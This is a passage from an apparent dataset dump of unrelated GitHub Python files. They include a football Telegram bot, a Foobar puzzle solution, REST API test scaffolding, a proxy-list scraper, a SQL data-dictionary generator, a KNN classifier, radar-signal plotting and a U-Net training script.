response[\"standings\"]:\n ranks.append(\"\\n*Group {}*\".format(group))\n for rank in response[\"standings\"][group]:\n ranks.append(\"``` {0:22s} {1:d} ```\".format(leagues_teams_ids[league_id][rank[\"teamId\"]], rank[\"points\"]))\n return \"*{0:s}*\\nMatchday {1:2d}\\n{2:s}\".format(\n response[\"leagueCaption\"], response[\"matchday\"], \"\\n\".join(ranks))\n\n\n# posts table of league\ndef table(bot, update, args):\n connection = get_connection(bot)\n if connection is None:\n return\n try:\n league_id = leagues[args[0].upper()]\n except Exception as e:\n league_id = 456\n response = get_table(connection, league_id)\n if league_id == 464:\n string = CL_table(response)\n else:\n ranks = []\n for rank in response[\"standing\"]:\n ranks.append(\"{0:2d} {1:22s} {2:d}\".format(\n rank[\"rank\"], leagues_teams_ids[league_id][rank[\"teamId\"]], rank[\"points\"]))\n string = \"*{0:s}*\\nMatchday {1:2d}\\n```{2:s}```\".format(\n response[\"leagueCaption\"], response[\"matchday\"], \"\\n\".join(ranks))\n bot.send_message(chat_id=update.message.chat_id,\n text=string, parse_mode=\"markdown\")\n return\n\n\n# parse fixtures, generates formatted message\ndef parse_fixtures(response, league_id, matchday, flag, time_zone):\n fixtures = []\n for fixture in response[\"fixtures\"]:\n if flag == 1 and fixture[\"status\"] != \"IN_PLAY\":\n continue\n if flag == 2 and fixture[\"status\"] == \"FINISHED\":\n continue\n else:\n home_goals = fixture[\"result\"][\"goalsHomeTeam\"]\n away_goals = fixture[\"result\"][\"goalsAwayTeam\"]\n if home_goals is None:\n home_goals = 0\n if away_goals is None:\n away_goals = 0\n fixtures.append(\"{0:s}\\n``` {1:>13s} {2:d} - {3:d} {4:s}```\\n\".format(parse_date(fixture[\"date\"], time_zone, fixture[\"status\"]), leagues_teams_ids[league_id][fixture[\"homeTeamId\"]], home_goals, away_goals, leagues_teams_ids[league_id][fixture[\"awayTeamId\"]]))\n return \"*{0:s}*\\nMatchday {1:d}\\n\\n{2:s}\".format(competitions_ids[league_id], matchday, \"\\n\".join(fixtures))\n\n\n# get current matchday for league_id\ndef get_matchday(connection, league_id):\n return get_table(connection, league_id)[\"matchday\"]\n\n\n# get time zone from arg\ndef get_tz(arg):\n try:\n time_zone = int(arg)\n except Exception as e:\n return 0\n return time_zone\n\n\n# parse args from /fixtures/live/remaining command\ndef get_league_matchday(connection, args, flag):\n # get league id\n if not args:\n league_id = 456\n matchday = get_matchday(connection, league_id)\n time_zone = 0\n else:\n try:\n league_id = leagues[args[0].upper()]\n except Exception as e:\n league_id = 456\n # format args for later parsing\n args.insert(0, 0)\n # if live/remaining get current matchday and time zone\n if flag != 0:\n matchday = get_matchday(connection, league_id)\n for arg in args:\n time_zone = get_tz(arg)\n # else try to read matchday from args\n elif flag == 0:\n if len(args) == 2:\n try:\n matchday = int(args[1])\n except Exception as e:\n matchday = get_matchday(connection, league_id)\n else: \n try:\n matchday = int(args[1])\n except Exception as e:\n matchday = get_matchday(connection, league_id)\n time_zone = get_tz(args[2])\n return league_id, matchday, time_zone\n\n\n# get fixtures for league and matchday\n# flag == 0 for whole matchday\n# flag == 1 for live games in matchday\n# flag == 2 for remaining games in matchday, includes live games\ndef get_fixtures(bot, args, flag, update):\n connection = get_connection(bot)\n if connection is None:\n return\n league_id, matchday, time_zone = get_league_matchday(connection, args, flag)\n try:\n connection.request(\"GET\", \"/v1/competitions/{}/fixtures?matchday={}\".format(league_id, matchday), None, headers)\n except Exception as e:\n error(bot)\n return\n bot.send_message(chat_id=update.message.chat_id,\n text=parse_fixtures(json.loads(connection.getresponse().read().decode()), league_id, matchday, flag, time_zone), parse_mode=\"markdown\")\n return\n\n\n# gets fixtures for matchday and league\ndef fixtures(bot, update, args):\n get_fixtures(bot, args, 0, update)\n return\n\n\n# gets live fixtures for league\ndef live(bot, update, args):\n get_fixtures(bot, args, 1, update)\n return\n\n\n# gets remaining fixtures for league\ndef remaining(bot, update, args):\n get_fixtures(bot, args, 2, update)\n return\n\n\n# start/help message\ndef start(bot, update):\n string = \"`/help ` command list\\n`/table [league-code]` shows table for selected league\\n`/fixtures [league-code] [matchday] [UTC-offset]` shows fixtures for selected league and matchday, e.g. `/fixtures SA 13 2`\\n`/live [league-code] [UTC-offset]` shows live fixtures for selected league\\n`/remaining [league-code] [UTC-offset]` shows remaining fixtures for selected league\\n`/team [team-name] [days] [UTC-offset]` shows fixture for team in the following days (all competitions)\\n\\nLeague codes:\\n`BSA` Brazilian Serie A\\n`PL ` Premier League\\n`ELC` Championship\\n`EL1` League One\\n`EL2` League Two\\n`DED` Eredivisie\\n`FL1` Ligue 1\\n`FL2` Ligue 2\\n`BL1` Bundesliga\\n`BL2` 2. Bundesliga\\n`PD ` La Liga\\n`SA ` Serie A\\n`PPL` Primeira Liga\\n`DFB` DFB Pokal\\n`SB ` Serie B\\n`CL ` Champions League\"\n bot.send_message(chat_id=update.message.chat_id,\n text=string, parse_mode=\"markdown\")\n return\n\n\n# get fixtures for team for following days\ndef get_team(bot, update, args):\n team = args[0].lower()\n connection = get_connection(bot)\n if connection is None:\n return\n # gets days from args\n try:\n days = int(args[1])\n except Exception as e:\n days = 15\n try:\n time_zone = int(args[2])\n except Exception as e:\n time_zone = 0\n # looks through all teams of (almost) all leagues\n # order of popularity/frequency of query (just a guess)\n # TODO (?) add remaining leagues FL2, BL2, BSA, ELC, EL1, EL2\n team_id = 0\n if team_id == 0:\n for t in teamsSA:\n if team in t.lower():\n team_id = teamsSA[t]\n break\n if team_id == 0:\n for t in teamsPL:\n if team in t.lower():\n team_id = teamsPL[t]\n break\n if team_id == 0:\n for t in teamsSB:\n if team in t.lower():\n team_id = teamsSB[t]\n break\n if team_id == 0:\n for t in teamsCL:\n if team in t.lower():\n team_id = teamsCL[t]\n break\n if team_id == 0:\n for t in teamsPD:\n if team in t.lower():\n team_id = teamsPD[t]\n break\n if team_id == 0:\n for t in teamsBL1:\n if team in t.lower():\n team_id = teamsBL1[t]\n break\n if team_id == 0:\n for t in teamsFL1:\n if team in t.lower():\n team_id = teamsFL1[t]\n break\n if team_id == 0:\n for t in teamsDED:\n if team in t.lower():\n team_id = teamsDED[t]\n break\n if team_id == 0:\n for t in teamsPPL:\n if team in t.lower():\n team_id = teamsPPL[t]\n break\n if team_id == 0:\n return\n fixtures = []\n if days > 0:\n connection.request(\"GET\", \"/v1/teams/{}/fixtures?timeFrame=n{}\".format(team_id, days), None, headers)\n response = json.loads(connection.getresponse().read().decode())\n for fixture in response[\"fixtures\"]:\n fixtures.append(\"*{}* {}\\n_Matchday {}_\\n{} - {}\\n\".format(competitions_ids[fixture[\"competitionId\"]], parse_date(fixture[\"date\"], time_zone, fixture[\"status\"]), fixture[\"matchday\"], leagues_teams_ids[fixture[\"competitionId\"]][fixture[\"homeTeamId\"]], leagues_teams_ids[fixture[\"competitionId\"]][fixture[\"awayTeamId\"]]))\n elif days < 0:\n connection.request(\"GET\", \"/v1/teams/{}/fixtures?timeFrame=p{}\".format(team_id, -days), None, headers)\n response = json.loads(connection.getresponse().read().decode())\n for fixture in response[\"fixtures\"]:\n fixtures.append(\"*{}* {} - _Matchday {}_\\n`{:>15s} {}-{} {}`\\n\".format(competitions_ids[fixture[\"competitionId\"]], parse_date_no_day(fixture[\"date\"], time_zone), fixture[\"matchday\"], leagues_teams_ids[fixture[\"competitionId\"]][fixture[\"homeTeamId\"]], fixture[\"result\"][\"goalsHomeTeam\"], fixture[\"result\"][\"goalsAwayTeam\"], leagues_teams_ids[fixture[\"competitionId\"]][fixture[\"awayTeamId\"]]))\n bot.send_message(chat_id=update.message.chat_id,\n text=\"{}\".format(\"\\n\".join(fixtures)), parse_mode=\"markdown\")\n return\n\n\nbot = telegram.Bot(token=bot_token)\nupdater = Updater(bot_token)\n\n# defines telegram commands\nupdater.dispatcher.add_handler(CommandHandler([\"start\", \"help\", \"aiuto\"], start))\nupdater.dispatcher.add_handler(CommandHandler('table', table, pass_args=True))\nupdater.dispatcher.add_handler(CommandHandler('team', get_team, pass_args=True))\nupdater.dispatcher.add_handler(CommandHandler('fixtures', fixtures, pass_args=True))\nupdater.dispatcher.add_handler(CommandHandler('live', live, pass_args=True))\nupdater.dispatcher.add_handler(CommandHandler('remaining', remaining, pass_args=True))\n\n# starts bot, waits for commands\nupdater.start_polling()\nupdater.idle()\n","repo_name":"TommasoAmici/football_telegram_bot","sub_path":"football_telegram_bot.py","file_name":"football_telegram_bot.py","file_ext":"py","file_size_in_byte":11414,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23388230488","text":"import sys\nsys.stdin = open(\"..//input.txt\",\"r\")\nsys.stdout = open(\"..//output.txt\",\"w\")\n# t = int(input())\n# for inputing array: arr = [int(x) for x in raw_input().split()]\n# \ta, b, c, x = map(int, raw_input().split())\n\ndef subtract(x,y,b):\n\tans = []\n\tfor i in range(len(x)):\n\t\tif x[i] < y[i]:\n\t\t\tx[i] = x[i] + b\n\t\t\tx[i+1] = x[i+1] - 1\n\t\tans.append(str(x[i]-y[i]))\n\tans.reverse()\n\treturn ''.join(ans)\n\n\ndef conv(x):\n\tarr = []\n\tfor i in range(len(x)):\n\t\ttemp = ord(x[i]) - 48\n\t\tarr.append(temp)\n\tarr.reverse()\n\treturn arr\n\ndef s(n,b):\n\tx_int = ''.join(sorted(n, reverse = True))\n\ty_int = ''.join(sorted(n, reverse = False))\n#\tprint(x_int, y_int)\n\tif len(x_int) != len(n):\n\t\tx_int = '0'*(len(n)-len(x_int)) + x_int\n\tif len(y_int) != len(n):\n\t\ty_int = '0'*(len(n)-len(y_int)) + y_int\n\n\tx1 = conv(x_int)\n\ty1 = conv(y_int)\n#\tprint(x1,y1)\n#\tprint(subtract(x1,y1,b))\n\treturn subtract(x1,y1,b)\n\ndef solution(n,b):\n\ttemp = 0\n\tarr = []\n\tarr.append(n)\n\twhile 1:\n\t\ttemp = s(n,b)\n\t\tif temp not in arr:\n\t\t\tarr.append(temp)\n\t\t\tn = temp\n\t\telse:\n\t\t\tbreak\n\treturn len(arr) - arr.index(temp)\n\nn = input()\nb = int(input())\n\nprint(solution(n,b))\n\n","repo_name":"utkryuk/Foobar-Challenge","sub_path":"hey-i-already-did-that.py","file_name":"hey-i-already-did-that.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28772644775","text":"#!/usr/bin/python2.7\n# -*- coding: utf-8 -*-\n\"\"\"\n \n\"\"\"\nfrom datetime import datetime\nfrom json import loads\nimport logging\nfrom threading import Thread\nfrom urllib.parse import urljoin\nimport os\n\nfrom flask import Flask\nimport requests\nfrom sqlalchemy import create_engine, schema, event, Column, Integer, String, ForeignKey, DateTime, func, Float\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.ext.hybrid import hybrid_property\nfrom sqlalchemy.orm import sessionmaker, relationship, scoped_session, backref\nimport tornado.web\nimport tornado.ioloop\nfrom flask.ext.restless import APIManager as FlaskRestlessManager\n\nfrom tornado_restless import ApiManager as TornadoRestlessManager\n\n\n__author__ = 'Martin Martimeo '\n__date__ = '21.08.13'\n\n\nclass TestBase(object):\n \"\"\"\n Base class for all tests\n\n sets up tornado_restless and flask_restless\n \"\"\"\n\n config = {\n 'dns': 'sqlite:///test.lite',\n 'encoding': 'utf-8',\n 'tornado': {'port': 7600}\n }\n\n def setUp(self):\n\n self.setUpAlchemy()\n self.setUpModels()\n self.setUpFlask()\n self.setUpTornado()\n self.setUpRestless()\n\n def setUpFlask(self):\n \"\"\"\n Create Flask application\n \"\"\"\n\n app = Flask(__name__)\n app.config['DEBUG'] = True\n app.config['TESTING'] = True\n app.config['SQLALCHEMY_DATABASE_URI'] = self.config['dns']\n\n self.flask = app\n\n def setUpTornado(self):\n \"\"\"\n Create Tornado application\n \"\"\"\n app = tornado.web.Application([])\n app.listen(self.config['tornado']['port'])\n self.tornado = app\n\n def setUpRestless(self):\n \"\"\"\n Create blueprints\n \"\"\"\n Session = self.alchemy['Session']\n\n self.api = {'tornado': TornadoRestlessManager(application=self.tornado, session_maker=Session),\n 'flask': FlaskRestlessManager(self.flask, session=Session())}\n\n for model, methods in self.models.values():\n if methods == \"all\":\n self.api['tornado'].create_api(model, methods=TornadoRestlessManager.METHODS_ALL)\n self.api['flask'].create_api(model, methods=TornadoRestlessManager.METHODS_ALL)\n else:\n self.api['tornado'].create_api(model)\n self.api['flask'].create_api(model)\n\n class TornadoThread(Thread):\n\n def run(self):\n try:\n tornado.ioloop.IOLoop.instance().start()\n finally:\n del self._target\n\n self.threads = {'tornado': TornadoThread(target=self),\n 'flask': self.flask.test_client()}\n self.threads['tornado'].start()\n\n def curl_tornado(self, url, method='get', assert_for=200, **kwargs):\n url = urljoin('http://localhost:%u' % self.config['tornado']['port'], url)\n r = getattr(requests, method)(url, **kwargs)\n if assert_for == 200:\n r.raise_for_status()\n else:\n assert assert_for == r.status_code\n try:\n try:\n return r.json()\n except ValueError:\n return None\n finally:\n r.close()\n\n def curl_flask(self, url, method='get', assert_for=200, **kwargs):\n\n # Map request parameter params to environ param query_string\n if 'params' in kwargs:\n kwargs['query_string'] = kwargs['params']\n del kwargs['params']\n\n r = getattr(self.threads['flask'], method)(url, **kwargs)\n assert assert_for == r.status_code\n return loads(r.data.decode(self.config['encoding']))\n\n def setUpAlchemy(self):\n \"\"\"\n Init SQLAlchemy engine\n \"\"\"\n engine = create_engine(self.config['dns'])\n metadata = schema.MetaData()\n Session = scoped_session(sessionmaker(bind=engine))\n Base = declarative_base(metadata=metadata)\n\n self.alchemy = {'Base': Base, 'Session': Session, 'engine': engine}\n\n def setUpModels(self):\n \"\"\"\n Create models\n \"\"\"\n\n Base = self.alchemy['Base']\n Session = self.alchemy['Session']\n engine = self.alchemy['engine']\n\n class City(Base):\n __tablename__ = \"cities\"\n\n _plz = Column(String(6), primary_key=True)\n\n name = Column(String, unique=True)\n\n class Person(Base):\n __tablename__ = 'persons'\n\n _id = Column(Integer, primary_key=True)\n name = Column(String, unique=True)\n birth = Column(DateTime)\n\n @hybrid_property\n def age(self):\n return (datetime.now() - self.birth).days / 365.25\n\n @age.expression\n def age(self):\n return func.now() - self.birth\n\n def __init__(self, name, age):\n self.name = name\n self.birth = datetime.now().replace(year=datetime.now().year - age)\n\n class City2Person(Base):\n __tablename__ = 'city2persons'\n\n _city = Column(ForeignKey(City._plz), primary_key=True)\n city = relationship(City, lazy=\"joined\", backref=backref('persons', lazy=\"dynamic\"))\n\n _user = Column(ForeignKey(Person._id), primary_key=True)\n user = relationship(Person, lazy=\"joined\", backref=backref('cities', lazy=\"dynamic\"))\n\n def __init__(self, city, user):\n self._city = city._plz\n self._user = user._id\n\n class Computer(Base):\n __tablename__ = 'computers'\n\n _id = Column(Integer, primary_key=True)\n\n cpu = Column(Float)\n ram = Column(Float)\n\n _user = Column(ForeignKey(Person._id))\n user = relationship(Person, backref='computers')\n\n Base.metadata.drop_all(engine)\n Base.metadata.create_all(engine)\n\n self.models = {'Person': (Person, \"all\"), 'Computer': (Computer, \"all\"), 'City': (City, \"read\")}\n\n frankfurt = City(_plz=60400 ,name=\"Frankfurt\")\n berlin = City(_plz=10800, name=\"Berlin\")\n\n self.citites = [frankfurt, berlin]\n\n anastacia = Person('Anastacia', 44)\n bernd = Person('Bernd', 48)\n claudia = Person('Claudia', 20)\n dennise = Person('Dennise', 14)\n emil = Person('Emil', 81)\n feris = Person('Feris', 10)\n\n self.persons = {p.name: p for p in [anastacia, bernd, claudia, dennise, emil, feris]}\n\n a1 = Computer(user=anastacia, cpu=3.2, ram=4)\n a2 = Computer(user=anastacia, cpu=12, ram=4)\n b1 = Computer(user=bernd, cpu=12, ram=8)\n e1 = Computer(user=emil, cpu=1.6, ram=2)\n e2 = Computer(user=emil, cpu=3.4, ram=4)\n\n self.computers = [a1, a2, b1, e1, e2]\n\n session = Session()\n session.add_all(self.citites)\n session.add_all(self.persons.values())\n session.add_all(self.computers)\n session.commit()\n\n session.refresh(bernd)\n session.refresh(anastacia)\n self.assocs = [City2Person(frankfurt, bernd), City2Person(frankfurt, anastacia), City2Person(berlin, bernd)]\n session.add_all(self.assocs)\n session.commit()\n\n def tearDown(self):\n\n self.tearDownTornado()\n self.tearDownAlchemy()\n\n def tearDownAlchemy(self):\n\n Base = self.alchemy['Base']\n engine = self.alchemy['engine']\n\n Base.metadata.drop_all(engine)\n\n del self.alchemy\n\n os.unlink('test.lite')\n\n def tearDownTornado(self):\n\n self.config['tornado']['port'] += 1\n\n def stop():\n \"\"\"\n Stop the IOLoop\n \"\"\"\n tornado.ioloop.IOLoop.instance().stop()\n\n tornado.ioloop.IOLoop.instance().add_callback(stop)\n self.threads['tornado'].join()\n\n def subsetOf(self, a, b):\n \"\"\"\n Test wether a is an subset of b (or b an superset of a)\n \"\"\"\n\n if type(a) != type(b):\n logging.error(\"Type not equal of a,b\")\n return False\n\n if isinstance(a, dict) or hasattr(a, \"items\"):\n for (key, value) in a.items():\n if not self.subsetOf(value, b[key]):\n return False\n else:\n return True\n\n if isinstance(a, list) or hasattr(a, \"__iter__\"):\n for element in a:\n if element not in b:\n return False\n else:\n return True\n\n return a == b\n\n\nif __name__ == \"__main__\":\n\n logging.basicConfig(level=logging.DEBUG)\n base = TestBase()\n base.setUp()\n try:\n base.threads[\"tornado\"].join()\n except KeyboardInterrupt:\n base.tearDown()\n","repo_name":"ovgu-ttz/tornado-restless","sub_path":"tests/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":8769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"74036396009","text":"#!/usr/bin/python2.7\n# -*- coding: utf-8 -*-\nimport requests\nfrom helper.extras import save_proxy, proxy_checker\nfrom helper.logger import Logger\n\n\nclass Hidester:\n def __init__(self):\n self.logger = Logger(name=self.__class__.__name__)\n\n def get_data(self):\n results = None\n try:\n url = \"https://hidester.com/proxydata/php/data.php\"\n querystring = {\"mykey\": \"data\", \"offset\": \"0\", \"limit\": \"500\", \"orderBy\": \"latest_check\",\n \"sortOrder\": \"DESC\",\n \"country\": \"\", \"port\": \"\", \"type\": \"http\", \"anonymity\": \"undefined\",\n \"ping\": \"undefined\",\n \"gproxy\": \"2\"}\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',\n 'X-Requested-With': 'XMLHttpRequest',\n 'Host': 'hidester.com',\n 'Referer': 'https://hidester.com/proxylist/'}\n\n response = requests.request(\"GET\", url, headers=headers, params=querystring)\n if response.status_code == 200:\n results = response.json()\n results = [x for x in results if x['type'] == 'http']\n except Exception as e:\n raise e\n return results\n\n def proxy_parser(self, data):\n results = []\n try:\n for result in data:\n result['address'] = result['IP']\n result['port'] = result['PORT']\n results.append(result)\n except Exception as e:\n raise e\n return results\n\n def main(self, path):\n html_dict = self.get_data()\n checker = self.proxy_parser(html_dict)\n self.logger.log('get {} proxies'.format(len(checker)))\n save_proxy(proxies=proxy_checker(checker), location=path)\n","repo_name":"yudhiana/proxy-generator","sub_path":"crawler/Hidester.py","file_name":"Hidester.py","file_ext":"py","file_size_in_byte":1912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4838498940","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 18 17:56:43 2021\n\n@author: lucas\n\"\"\"\nimport pandas as pd\n\nfrom pathlib import Path\nGR_BASE_DIR = Path(__file__).resolve().parent.parent\n\n\ndata = open(f'{GR_BASE_DIR}/SQL-base-completo-DW.sql', \n 'r', \n encoding=\"utf8\")\n\nschema = ''\ntabela = ''\ncampo = ''\ntipo = ''\ntamanho = 0\nespecificacoes = ''\nvirgula = ''\n\narquivo = open(f'{GR_BASE_DIR}/SQL-cadastro-dic.sql','w')\n\narquivo.write(f'INSERT INTO dic_dados \\n')\narquivo.write(f' (schema, tabela, campo, tipo, tamanho, especificacoes, observacao)')\narquivo.write(f'\\n')\narquivo.write(f'VALUES')\narquivo.write(f'\\n')\n\nfor text in data:\n \n text = text.replace('\\n', ' ').replace('\\t', ' ').replace(',', ' ')\n \n inf = []\n \n for i in text.split(' '):\n if i != '':\n inf.append(i)\n \n inf = ' '.join(inf).replace(\"'\", '\"')\n \n if len(inf) != 0:\n if 'TABLE' in inf and 'CREATE' in inf:\n \n controle = False\n aux = inf.split(' ')[5].split('.')\n tabela = aux[1]\n schema = aux[0]\n \n elif 'EXTENSION' not in inf and \\\n 'SEQUENCE' not in inf and \\\n 'SCHEMA' not in inf and \\\n 'FOREIGN' not in inf and \\\n 'GRANT' not in inf and \\\n ');' not in inf:\n\n lin = inf.split('--')\n observacao = lin[1].strip()\n inf = lin[0].split(' ')\n\n if len(inf) > 2:\n \n campo = inf[0]\n \n if 'TIMESTAMP' in inf and 'ZONE' in inf:\n tipo = ' '.join(inf[1:5])\n especificacoes = ' '.join(inf[5:])\n \n else:\n tipo = inf[1]\n especificacoes = ' '.join(inf[2:])\n \n elif len(inf) == 2:\n \n campo = inf[0]\n tipo = inf[1]\n \n \n if 'VARCHAR' in tipo:\n \n aux = tipo.replace('(', ' ').replace(')', '')\n aux = aux.split(' ')\n tipo = aux[0]\n tamanho = aux[1]\n \n arquivo.write(f'{virgula}')\n arquivo.write(f' (')\n arquivo.write(f\"'{schema}', \")\n arquivo.write(f\"'{tabela}', \")\n arquivo.write(f\"'{campo}', \")\n arquivo.write(f\"'{tipo}', \")\n arquivo.write(f\"{tamanho}, \")\n arquivo.write(f\"'{especificacoes}',\")\n arquivo.write(f\"'{observacao}'\")\n arquivo.write(f')')\n \n campo = ''\n tipo = ''\n tamanho = 0\n especificacoes = ''\n virgula = ',\\n'\n\narquivo.write(f'\\n') \narquivo.close()\n\n\n \n","repo_name":"lucas-reinaldet/Anotacoes","sub_path":"01 - Python-Uteis/Dic_dados.py","file_name":"Dic_dados.py","file_ext":"py","file_size_in_byte":2917,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"22429799732","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier\n\nglobal data\ndef getData():\n global data\n data = pd.read_csv('files/covid.csv')\n\ndef prepareData():\n global data\n #print(data.isna().sum())\n features = [\n 'Dry-Cough',\n 'Difficulty-in-Breathing',\n 'Sore-Throat',\n 'Runny-Nose',\n 'Fever',\n 'Tiredness'\n ]\n target = ['Infected']\n independentTraining, independentTest, dependentTraining, dependentTest = train_test_split(data[features], data[target], test_size=0.3, random_state=0)\n return {\n 'independentTraining': independentTraining,\n 'independentTest': independentTest,\n 'dependentTraining': dependentTraining,\n 'dependentTest': dependentTest\n }\n\ndef model(dataModel):\n knn = KNeighborsClassifier(n_neighbors=7)\n dependentTraining = np.ravel(dataModel['dependentTraining'])\n knn.fit(dataModel['independentTraining'], dependentTraining)\n prediction = knn.predict(dataModel['independentTest'])\n accuracy = knn.score(dataModel['independentTest'], dataModel['dependentTest'])\n return {\n 'prediction': prediction,\n 'accuracy': accuracy\n }\n\ndef message(prediction):\n numberOfPredictions = [int(predictions) for predictions in prediction['prediction']]\n accuracyRound = round(prediction['accuracy'], 2)\n effectiveness = accuracyRound * 100\n infected = numberOfPredictions.count(1)\n noInfected = numberOfPredictions.count(0)\n message = 'This is the prediction of the model:'\n message += '\\n'\n message += 'Infected: ' + str(infected)\n message += '\\n'\n message += 'No infected: ' + str(noInfected)\n message += '\\n'\n message += 'The effectiveness of the model was: ' + str(effectiveness) + '%'\n print(message)\n\ndef run():\n getData()\n prediction = model(prepareData())\n message(prediction)\n\nif __name__ == '__main__':\n run()","repo_name":"ecorrea1010/supervisedLearning","sub_path":"src/KnnAlgorithm.py","file_name":"KnnAlgorithm.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23096707163","text":"from django.conf.urls import include, url\nimport views\n\n\nurlpatterns = [\n url(\n r'^retrieve-apiuser/(?P[0-9]+)/$',\n views.DetailApiKeyUser.as_view()\n ),\n url(\n r'^generate-token/$',\n views.GenerateToken.as_view()\n ),\n url(\n r'^example/$',\n views.ExampleView.as_view()\n ),\n\n]\n","repo_name":"VEinteligente/vsf-incidents-server","sub_path":"vsf_user/rest/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11492776217","text":"from postgresql_operations import read_table_postgresql\nimport matplotlib.pyplot as plt\nimport numpy as np \n\ndef plot_radar_signal(data, title):\n \"\"\"Plots a single received signal from the radar sample\"\"\"\n plt.figure(figsize = (10, 5))\n plt.plot(data)\n plt.xlabel('# Sample ')\n plt.ylabel(\"Amplitude [V]\")\n plt.title(f\"{title}\")\n plt.savefig(\"./images_/{}\".format(title))\n plt.show()\n\ndef visualize_radar_samples(data, title):\n \"\"\"Plots a radar sample\"\"\"\n plt.figure(figsize = (10, 3))\n plt.imshow(data,interpolation=\"none\")\n plt.xlabel('# Sample')\n plt.ylabel(\"\")\n plt.title(f\"{title}\")\n plt.savefig(\"./images_/{}\".format(title))\n plt.show()\n\ndef extract_data_per_no_persons(table_name, detailed_label, database_config):\n \"\"\"Extracts a sigle radar sample from table_name, based on the number of persons number_persons\"\"\"\n query = \"\"\"SELECT radar_sample FROM PUBLIC.{} WHERE detailed_label = '{}' LIMIT 1;\"\"\".format(table_name, detailed_label)\n headers, data = read_table_postgresql(table_name=table_name,database_config= database_config, limit = 1, query = query)\n return data \n\ndef visualize_radar_samples_by_scenario(data, scenario, number_persons):\n \"\"\"Visualize a radar sample and a single received signal from the radar sample by scenario and number of persons\"\"\"\n title_radar_sample = f\"Radar Sample, {number_persons} persons, {scenario} scenario\"\n title_plot_signal = f\"Received Signal, {number_persons} persons in the radar range, {scenario} scenario\"\n visualize_radar_samples(data, title_radar_sample)\n plot_radar_signal(data[100, :], title=title_plot_signal)\n\n\nif __name__ == \"__main__\":\n database_config = {\n 'host': 'localhost',\n 'port': 5432,\n 'dbname': 'UWB_Radar_Samples',\n 'user': '',\n 'password': ''\n }\n tables ={\n \"scenario_1\": [\"people_walking_5m_area\", \"people walking in 5m area\"],\n \"scenario_2\" :[\"people_standing_queue_0_15\", \"people standing in a queue\"],\n \"scenario_3\": [\"density_3_m2_11_20\", \"people walking in a room with 3 persons per m2\"],\n \"scenario_4\": [\"density_4_m2_11_20\" , \"people walking in a room with 4 persons per m2\",],\n \"processed_data\": [\"processed_data\", \"\"]\n }\n table_name = tables[\"processed_data\"][0]\n scenario = tables[\"processed_data\"][1]\n scenario = 'in the first'\n detailed_label = 110\n number_persons = 10\n shape = (200, 50)\n data = extract_data_per_no_persons(table_name=table_name, detailed_label=detailed_label, database_config=database_config)\n data = np.array(data)\n data_res = np.reshape(data, shape)\n # data_prep = process_data_pipeline(data_res, fs=39*1e9)\n visualize_radar_samples_by_scenario(data=data_res, scenario=scenario, number_persons=number_persons)\n\n\n","repo_name":"cristinaa211/People_counting_CNN_UWB","sub_path":"tools/visualize_data.py","file_name":"visualize_data.py","file_ext":"py","file_size_in_byte":2821,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"71308680809","text":"\nfrom tf_SDUnet import image_gen,image_util,unet,util\nimport numpy as np\n\n#preparing data loading\n# data_provider = image_util.ImageDataProvider(\"nuclei/*.png\",data_suffix=\".png\", mask_suffix=' (2).png', n_class=2)\n#\n# data_provider = image_util.ImageDataProvider(\"data_set/train/*.tif\",data_suffix=\".tif\", mask_suffix='_mask.tif', n_class=2)\nDT = image_util.ImageDataProvider(\"test2/DT/*.tif\",data_suffix=\".tif\", mask_suffix='_binary.tif', n_class=2)\nST = image_util.ImageDataProvider(\"test2/ST/*.tif\",data_suffix=\".tif\", mask_suffix='_binary.tif', n_class=2)\n# data_provider = image_util.ImageDataProvider(\"Tissue_images/*.tif\",data_suffix=\".tif\", mask_suffix='_binary.tif', n_class=2)\n#data_provider = image_util.ImageDataProvider(\"Kumar_aug/aug/*.tif\",data_suffix=\".tif\", mask_suffix='_binary.tif', n_class=2)\ndata_provider = image_util.ImageDataProvider(\"tissue_aug/train/*.tif\",data_suffix=\".tif\", mask_suffix='_binary.tif', n_class=2)\noutput_path=\"model_f8_0.88_dice_100\"\n#setup & training\nnet = unet.Unet(layers=4, features_root=8, channels=3, n_class=2,cost=\"dice_coefficient\")\ntrainer = unet.Trainer(net,batch_size=4,verification_batch_size=4,optimizer=\"adam\")\npath = trainer.train(data_provider, output_path,keep_prob=0.88,block_size=7,training_iters=64, epochs=100,display_step=2,restore=False)\ntest_x, test_y = DT(6)\nprediction = net.predict(path, test_x)\nerror=unet.error_rate(prediction, util.crop_to_shape(test_y, prediction.shape))\nprint(\"DT error:\",error)\nf1=unet.f1score2(prediction, util.crop_to_shape(test_y, prediction.shape))\nprint(\"DTf1:\",f1)\nimg = util.combine_img_prediction(test_x, test_y, prediction)\nutil.save_image(img, \"DTtest.jpg\")\ntest_x, test_y = ST(8)\nprediction = net.predict(path, test_x)\nerror=unet.error_rate(prediction, util.crop_to_shape(test_y, prediction.shape))\nprint(\"ST error:\",error)\nf1=unet.f1score2(prediction, util.crop_to_shape(test_y, prediction.shape))\nprint(\"STf1:\",f1)\nimg = util.combine_img_prediction(test_x, test_y, prediction)\nutil.save_image(img, 